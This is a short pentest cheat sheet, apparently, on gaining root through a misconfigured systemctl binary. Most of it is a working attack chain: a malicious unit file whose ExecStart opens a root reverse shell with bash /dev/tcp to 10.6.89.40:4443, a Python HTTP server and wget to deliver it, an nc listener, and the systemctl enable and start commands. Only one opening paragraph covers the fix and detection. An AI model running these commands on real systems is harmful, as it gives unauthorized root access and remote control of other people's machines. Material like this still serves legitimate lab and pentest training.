# systemctl privesc

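Privilege escalation through a misconfigured systemctl binary: either the SUID bit is set on it, or a sudo rule lets an unprivileged user run it. In both cases systemctl runs as root and will enable and start any unit file the caller points it at, so the unit's ExecStart command runs as root. The misconfiguration is closed by removing the SUID bit from systemctl and by not granting unrestricted systemctl through sudo; unit files enabled from user-writable paths such as /var/tmp are a useful detection signal.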

# Find a writable file or directory

find / -maxdepth 2 -writable -type d  # writable directories
find / -maxdepth 2 -writable -type f  # writable files

# Write payload shellz.service

[Unit]
Description=shellz

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.6.89.40/4443 0>&1' # Change IP and/or port

[Install]
WantedBy=multi-user.target

I like to write the file with cat > if you have upgraded your shell. Otherwise, you can set up a simple HTTP server on the attacking box and fetch the file with wget.

python3 -m http.server 80

On the target

wget http://10.6.89.40/shellz.service # Change IP

# Set up a listener

Set up a listener on the attacking box.

nc -lvnp 4443

# Start the service

Execute the payload, assuming the unit file was saved under /var/tmp.

/bin/systemctl enable /var/tmp/shellz.service
/bin/systemctl start shellz